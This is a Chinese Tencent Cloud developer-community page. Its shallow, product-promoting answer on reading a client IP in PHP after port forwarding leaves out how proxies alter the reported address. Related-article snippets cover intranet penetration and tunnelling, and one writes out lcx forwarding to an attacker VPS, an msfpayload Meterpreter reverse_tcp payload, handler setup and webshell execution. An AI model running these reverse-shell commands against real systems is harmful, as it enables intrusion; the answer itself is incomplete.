开发者社区

文档建议反馈控制台

最新优惠活动

文章/答案/技术大牛

发布

端口转发后在PHP / Apache中获取远程IP

在PHP / Apache中获取远程IP地址的方法是通过访问$_SERVER'REMOTE_ADDR'变量来获取。$_SERVER是一个包含了服务器和请求信息的数组，其中REMOTE_ADDR键对应的值即为远程客户端的IP地址。

端口转发是一种网络通信技术，它允许将来自一个网络端口的数据流转发到另一个网络端口。它通常用于将外部请求转发到内部服务器，以实现对内部服务的访问。

端口转发的分类包括静态端口转发和动态端口转发。静态端口转发是将外部端口与内部端口进行一对一的映射，而动态端口转发则是根据请求的目标地址和端口动态地选择内部服务器进行转发。

端口转发的优势在于可以隐藏内部服务器的真实IP地址，增加了网络安全性。它还可以实现负载均衡和高可用性，通过将请求分发到多个内部服务器上，提高了系统的性能和可靠性。

在实际应用中，端口转发可以用于以下场景：

内网穿透：通过端口转发技术，将内部服务器暴露在公网上，实现对内部服务的远程访问。
负载均衡：通过将请求分发到多个内部服务器上，实现对请求的负载均衡，提高系统的性能和可靠性。
高可用性：通过将请求转发到多个内部服务器上，实现对请求的冗余处理，提高系统的可用性。
安全性增强：通过隐藏内部服务器的真实IP地址，减少了暴露在公网上的风险。

腾讯云提供了一系列与端口转发相关的产品和服务，包括负载均衡、弹性公网IP、NAT网关等。这些产品可以帮助用户实现端口转发的需求。具体产品介绍和链接如下：

负载均衡：腾讯云负载均衡（CLB）是一种将流量分发到多个后端服务器的服务，实现负载均衡和高可用性。了解更多：https://cloud.tencent.com/product/clb
弹性公网IP：腾讯云弹性公网IP（EIP）是一种可以独立申请、绑定和解绑的公网IP地址，可以实现对内部服务器的访问。了解更多：https://cloud.tencent.com/product/eip
NAT网关：腾讯云NAT网关是一种可以将私有网络中的服务器访问公网的流量进行转发的服务。了解更多：https://cloud.tencent.com/product/nat

通过使用腾讯云的端口转发相关产品和服务，用户可以方便地实现对内部服务器的访问和负载均衡，提高系统的性能和可靠性。

相关搜索:如何在php/apache配置中获取域名后的URL参数？在apache cordova应用程序中获取php内容带端口的IP在cURL PHP中不起作用在Java中获取Application Server名称或ip和端口在C#中通过远程处理获取外部IP地址 Arangodb，只需在php中运行插入查询后获取id？在PHP中获取服务器的主机名或IP地址在PHP/HTML中"post“方法后获取所选下拉列表的值在PHP7.2和CodeIgniter 3中，Dompdf0.8.3不获取远程CSS 在python socket编程中，如何在建立连接后获取客户端的Ip地址？在php中裁剪图像并获取裁剪后的图像部分数据作为字符串 cURL错误60: SSL证书问题:在php.ini文件中添加证书文件xxx.pem路径后，无法获取本地颁发者证书

相关搜索:

页面内容是否对你有帮助？

有帮助

没帮助

相关·内容

常见端口转发工具的使用方式

NetCat NetCat是一个非常简单的Unix工具，可以读、写TCP或UDP网络连接。用途： 1：侦听/传输模式 2：获取banner信息 3：传输文本信息 4：传输文件/目录 5：远程控制

浅谈内网端口转发

在渗透测试过程中，我们经常会用到端口转发，利用代理脚本将内网的流量代理到本地进行访问，这样极大的方便了我们对内网进行横向渗透。最常见的端口转发工具不限于以下几款，大家可以根据在实际测试过程的需要进行选择。

01

内网渗透-代理篇

利用代理工具将内网的流量代理到本地进行访问，这样就可以对内网进行下一步渗透，同时也可以利用代理工具将其他网段的流量转发到本地进行纵向渗透。代理的本质是Socks协议(防火墙安全会话转换协议)，工作在OSI参考模型的第5层（会话层）。使用TCP协议传输数据，因而不提供如传递ICMP信息之类的网络层相关服务。目前支持SOCKS4和SOCKS5两个版本：

03

实战|如何在Linux 系统上免费托管网站

Web 服务器可用于指代硬件和软件，或者两者一起工作。出于本指南的目的，我们将重点关注软件方面，并了解如何在 Linux 机器上托管网站。

02

内网隧道之Venom

玄武实验室的Dliv3作品，最后更新于2019年，用Go编写，多级代理工具，功能极强，但是现在基本被各大杀软查杀了（需做好免杀）

02

内网渗透测试：隐藏通讯隧道技术

上一节中，我们讲解了网络层的隧道技术（IPv6 隧道、ICMP 隧道）和传输层的隧道技术（TCP 隧道、UDP 隧道、常规端口转发）。现如今，TCP、UDP 通信大量被防御系统拦截，传统的Socket隧道也已经濒临淘汰，DNS、ICMP、HTTP/HTTPS 等难以被禁用的协议已经成为了攻击者控制隧道的主要渠道。在这一节中，我们将对应用层的隧道 SOCKS 代理技术进行实验性的讲解，由于小编能力太菜，很多东东也是现学现卖，应用层的DNS隧道我会在未来专门写一个专题进行讲解。

04

ATT&CK视角下的红蓝对抗：一. 隧道穿透技术详解

从技术层面来讲，隧道是一种通过互联网的基础设施在网络之间传递数据的方式，其中包括数据封装、传输和解包在内的全过程,使用隧道传递的数据(或负载)可以使用不同协议的数据帧或包。

07

SSRF漏洞利用与getshell实战（精选）

SSRF（Server-Side Request Forgery，服务器端请求伪造）是一种由攻击者构造请求，利用服务器端发起的安全漏洞。一般情况下，SSRF攻击的目标是外网无法访问的内部系统（正因为请求是由服务器端发起的，所以服务器能请求到与自身相连而外网隔离的内部系统）。

03

第二次实战演习记录

开放端口：利用fofa查件搜集一波，nmap搜集到135、139、445是filtered状态

01

渗透测试-工具篇

当前大量开发人员使用git进行版本控制，对站点自动部署。如果配置不当，可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。

03

内网渗透指南

使用端口扫描工具可以实现主机发现的功能，但也有些动作小的主机发现工具（Kali），可以有效的发现存活主机。自己写个 ping 的循环脚本也可以。

02

记一次获取远程桌面历程

整体流程：第一步，万能密码进入后台第二步，传免杀马连菜刀第三步，端口转发第四步，读取hash值

02

ATT&CK视角下的红蓝对抗：五. 内网穿透之利用HTTP协议进行隧道穿透

ATT&CK视角下的红蓝对抗：四. 内网穿透之通过Earthworm(EW)进行隧道穿透

第二次实战演习记录

开放端口：利用fofa插件搜集一波，nmap搜集到135、139、445是filtered状态

02

CFS三层靶机

VM虚拟网站配置的话需要配置三张网卡，这里通外网的我设置为了桥接，网段2就是VM2网段3就是VM3

03

SSRF详细利用方式及getshell

在存在ssrf处访问http://10.1.1.200(本机服务地址) 查看kali机器服务器日志信息：

02

reverse_tcp反向连接在实战中的应用

0x02 reverse_tcp实战应用过程 (1) 前期测试试了些已公布的2008提权EXP，不过都失败了，第三方软件也只找到一个Filezilla Server。先把C:\Program Files (x86)\FileZilla Server文件夹打包到我们本地，然后再用lcx把Filezilla Server的14147端口转发出来，lcx执行命令如下。首先VPS机器监听51端口，连接用14147端口： VPS机器执行： C:\>lcx.exe -listen 51 14147 目标机器执行： /c C:\aspSmartUpload\lcx.exe -slave {公网VPS IP} 51 127.0.0.1 14147 lcx转发了FileZilla Server的14147端口后还是连接不上，返回右上图这样的报错，Google翻译报错信息得知：协议错误：未通过身份验证，关闭连接，连接到服务器关闭。使用netstat -ano命令查看当前网络连接状态如下。 TCP 9*.1*9.4.1*3:139 0.0.0.0:0 LISTENING 4 TCP 9*.1*9.4.1*3:54133 1*3.2*1.*7.1*8:51 ESTABLISHED 2028 TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 1040 TCP 127.0.0.1:14147 0.0.0.0:0 LISTENING 1088 TCP 127.0.0.1:14147 127.0.0.1:49160 ESTABLISHED 1088 TCP 127.0.0.1:49160 127.0.0.1:14147 ESTABLISHED 5736 可以看到我们已经与目标机器建立了一个完整TCP连接，而且我们本地机器也成功的返回了数据，但是好像返回的数据信息中有错误，如下图。当前问题：不能正常把目标服务器的FileZilla Server 14147端口给转发出来，返回数据中出错了，所以无法在本地连接上FileZilla Server服务端。解决办法：利用Metasploit工具里的reverse_tcp反向连接生成一个EXE攻击载荷文件，然后在Meterpreter会话中用portfwd命令进行端口转发即可。 (2) 实战应用如果我们自己也处于内网环境的情况下，那么就需要先在路由器里进行端口映射配置，然后再用reverse_tcp反向连接来生成一个EXE攻击载荷文件，命令如下。 root@devil:~# msfpayload windows/x64/meterpreter/reverse_tcp LHOST=1*3.2*1.*7.1*8 LPORT=12345 X > /media/sf_系统学习/test.exe 先把我们生成好的test.exe载荷文件上传至目标机器的可读/写目录下，然后进入到MSF完成所有必填的配置选项，执行命令如下。 use exploit/mutil/handler //加载监听模块 set PAYLOADY windows/x64/meterpreter/reverse_tcp //设置攻击载荷 set LHOST 192.168.1.4 //设置攻击者内网IP set LPORT 12345 //设置本地监听端口 exploit //exploit执行监听将必填配置选项完成后执行exploit命令进行监听，然后在WebShell执行C:\aspSmartUpload\test.exe载荷文件，如果成功的话就会返回一个reverse_tcp反向连接的会话。成功得到目标机器Meterpreter会话，然后直接使用portfwd命令进行端口转发即可，执行命令如下。 meterpreter > portfwd add -l 14147 -p 14147 -r 127.0.0.1 使用portfwd命令成功执行端口转发操作后，我们再来连接目标机器的FileZilla Server服务端看下是否能正常连接

02

一次简单的内网渗透靶场练习

当开启general log为on时，所执行的sql语句都会出现在stu1.log文件中。那么，如果修改generallogfile的值，那么所执行的sql语句就会对应生成对应的文件中，进而getshell。所以为了get shell，我们将general log设为on，将general log file设为C:/phpStudy/WWW/test.php

02

企业安全 | 找工作看这些面试题就够了！

答：信息搜集：whois、网站源IP、旁站、C段网站、服务器系统版本、容器版本、程序版本、数据库类型、二级域名、防火墙......

02

内网渗透基础_内网穿透技术详解

一般内网安全检查使用第一种思路，实际的攻击2种思路结合实现。第二种思路，社工的比重更大一些

01

内网渗透思路整理

一般内网安全检查使用第一种思路，实际的攻击2种思路结合实现。第二种思路，社工的比重更大一些

01

内网渗透 | 内网转发工具的使用

在渗透测试中，当我们获得了外网服务器（如web服务器，ftp服务器，mali服务器等等）的一定权限后发现这台服务器可以直接或者间接的访问内网。此时渗透测试进入后渗透阶段，一般情况下，内网中的其他机器是不允许外网机器访问的。这时候，我们可以通过端口转发(隧道) 或将这台外网服务器设置成为代理，使得我们自己的攻击机可以直接访问与操作内网中的其他机器。实现这一过程的手段就叫做内网转发。

02

内网渗透之各种正反向内网穿透、端口转发（http,socks5）- 渗透红队笔记

在我们拿下一个Webshell的时候，我们没办法把一些工具上传到目标服务器上去使用，那样可能会有风险，而且有的时候还没有特定的环境来使用工具。这个时候我们就可以使用内网穿透来吧服务器的流量代理到本地，就相当于我们是在内网环境，我们就可以使用自己PC上的工具对内网进行扫描，内网渗透，域渗透等等。

03

Linux内网渗透

能够成功地通过web漏洞获取到webshell，对于一次完整的渗透测试来说，仅仅相当于万里长征的第一步。并不是所有渗透测试都会遇到几百台机器的大内网。

04

一个人的武林：内网渗透测试思路（二）

写在前面跟web渗透（上一篇）不同，内网渗透需要更多的随机性和突破口，情况较为复杂，遇到障碍，有时可以换种思路突破，很多时候则无奈的只能止步于此。下面分享一些自己总结的内网渗透经验。主要是以windows下的操作为主。 0×01 斗转星移（在拿到webshell的时候，想办法获取系统信息拿到系统权限）一、通过常规web渗透，已经拿到webshell。那么接下来作重要的就是探测系统信息，提权，针对windows想办法开启远程桌面连接，针对linux想办法使用反弹shell来本地连接。 ① Webshel

06

千防万防，黑客难防！获取远程桌面权限

找到上传点，上传1.php文件失败，提示只允许上传jpg文件。于是传图马抓包改后缀

03

ATT&CK视角下的红蓝对抗:十一.内网穿透之利用SSH协议进行隧道穿透

SSH（Secure Shell）协议是一种加密的网络传输协议，它可以在不安全的网络中提供安全的远程登录和文件传输服务。SSH协议使用加密技术来保护数据的机密性和完整性，使得网络传输数据的安全性得到了保障。除了提供安全的远程登录服务外，SSH协议还可以用于隧道穿透，即将一种网络协议的流量通过SSH连接传输，以绕过防火墙或其他网络限制。

玩转SSH端口转发

SSH有三种端口转发模式，本地端口转发(Local Port Forwarding)，远程端口转发(Remote Port Forwarding)以及动态端口转发(Dynamic Port Forwarding)。对于本地/远程端口转发，两者的方向恰好相反。动态端口转发则可以用于科学上网。

08

内网基础-隐藏通信隧道技术

当我们在外网打下一个点，通过arp，netstat，以及ifconifg（ipconfig）等信息收集，发现此点为dmz，可通内网，那么这时候我们需要在此点上搭建通向内网的隧道，为内网渗透打下坚实基础。

03

穿越边界的姿势

在企业安全对抗中，红方攻击团队经常会遇到这种情况，在企业的网络边界上获取到部分权限，比如一个web服务器的webshell，然而如何更方便的进行下一步的渗透呢？如何对内网进行渗透测试，这时就需要隧道转发技术，穿透边界防火墙、安全代理等安全设备，进行深层次的安全测试。本文的主要内容是穿透内网的各种姿势。

01

如何设置 SSH 隧道(端口转发)

SSH隧道或SSH端口转发是一种在客户端和服务器机器之间创建加密SSH连接的方法，通过该连接可以中继服务端口。

02

SSH隧道端口转发功能详解

ssh隧道大致可以分为3种，分别为本地端口转发，远程端口转发，动态端口转发，本文将让你彻底搞懂这3个转发的命令表达形式，让你能够灵活运用解决生活中的各种特殊场景。

03

跨内外网远程操作Spark

我们知道通过反向ssh可以借助有固定IP的外网服务器登陆没有外网IP的内网主机，但是我们在真正使用的时候可能不仅仅需要远程登陆，可能还会需要内网机器中其他端口提供的服务。比如现在我需要在远处利用Spark程序去操作内网机器里的分布式系统进行工作，这就至少需要调用内网机器的7077端口(默认的Spark调用端口)和9000端口(默认的hdfs端口)。那么这时候我们应当怎么处理呢？

02

SSH高级功能 - 远程端口转发

在本地端口的场景中，可以从Server-B建立到Server-A的SSH连接，但是如果Server-B到Server-A之间无法连接，只有Server-A到Server-B的连接呢？（比如开发机可以访问服务器，但是服务器一般是不可以访问本地开发机的）

02

快速上手SSH

由于现在许多项目和工程都在云服务器上部署，对于程序员来说，日常工作中常常会有登陆远程服务器的需求，所以使用SSH就成了一项必备的技能。

01

SSH 隧道：端口转发功能详解！

SSH 隧道是一种安全的数据传输方法，它允许我们在不安全的网络上建立一个安全的连接。SSH 隧道提供两大功能：

01

linux ssh端口转发的三种方式

ssh是我使用最频繁的两个命令行工具之一（另一个则必须是vim）。有了ssh，我可以远程处理各种可能出现的问题而无需肉身到现场。

01

网站安全检测中具体渗透测试方法

越来越多的网站以及app手机端客户注重安全渗透测试服务,上线前必须要对平台进行全面的预渗透测试找出安全漏洞以及BUG,很多客户找我们SINE安全,做渗透测试服务的时候对具体的流程可能不太了解,下面我们把具体的渗透测试方法流程大体写的全面一点给大家呈现。

02

最全的网站渗透测试详细检测方法

有授权的情况下直接使用 nmap 、masscan 、自己写py脚本等端口扫描工具直接获取开放的端口和获取服务端的 banner 信息。

01

最全的渗透测试具体详细检测方法

越来越多的网站以及app手机端客户注重安全渗透测试服务,上线前必须要对平台进行全面的预渗透测试找出安全漏洞以及BUG,很多客户找我们SINE安全,做渗透测试服务的时候对具体的流程可能不太了解,下面我们把具体的渗透测试方法流程大体写的全面一点给大家呈现。

01

如何绕过堡垒机远程登录

假设一个场景：在Webshell中执行mimikatz获取到win管理员密码，并且本地查看端口3389是开放的，可是从当前跳板机无法远程到目标机器。因为某个特定需求，一定要远程登录到这台win服务器，这时该怎么办？

03

浅谈HTTP隐蔽隧道下的RDP暴力破解测试

HTTP隧道用于在受限网络连接的条件下在两台计算机之间创建网络链接，用于绕过IDS、Firewall一类的安全设备限制实现基于HTTP协议的通信，常常用于内网里面的端口转发与流量代理由于HTTP通信流量往往与正常流量差异较少一般不容易被检测出来。

02

ssh与frp实现内网穿透

很多时候我们需要内网穿透来进行一些操作因为我们本地是内网而且在没有端口转发的情况下 msf不能很好的去使用。所以今天来总结一下利用ssh frp实现内网穿透后利用msf的过程。

02

记一次绕系统防火墙反弹案例

Date/time：2016年，这次遇到的问题有些奇葩，这里简单记录下测试过程。已经拿到目标主机最高权限，但是在转发3389端口时遇到了问题。

05

Meterpreter 端口转发

如何转发无法远程访问的本地端口。在本地计算机上运行特定服务。在本地网络上，这些服务通常是用于在本地计算机上访问，外网是不能访问的，比如MySQL服务器。出于安全原因，MySQL服务器在安装时默认禁用远程访问，并要求系统管理员明确启用远程访问以允许远程连接。在本教程中，我们将使用Meterpreter端口转发将隧道连接到无法远程访问的服务。

03

从零开始内网安全渗透学习

0x00 win2008(域控) 1、修改计算机名： 2、配置固定ip: 其中网关设置错误，应该为192.168.206.2，开始默认的网管 3、服务器管理器---角色： 4、配置域服务: do

零基础看内网渗透技术

2、配置固定ip: 其中网关设置错误，应该为192.168.206.2，开始默认的网管

01

如何让JSP与PHP项目共存-Apache端口转发设置

Apache端口转发，可以实现在一台服务器上开放一个端口，实现PHP与JSP、Node.js、Python等多个web服务共存的需求。

01

Meterpreter 端口转发教程

如何转发无法远程访问的本地端口。在本地计算机上运行特定服务。在本地网络上，这些服务通常是用于在本地计算机上访问，外网是不能访问的，比如MySQL服务器。出于安全原因，MySQL服务器在安装时默认禁用远程访问，并要求系统管理员明确启用远程访问以允许远程连接。在本教程中，我们将使用Meterpreter端口转发将隧道连接到无法远程访问的服务。

03

扫码

添加站长进交流群

领取专属 10元无门槛券

手把手带您无忧上云

扫码加入开发者社群

相关资讯

热门标签

活动推荐

运营活动

活动名称

广告关闭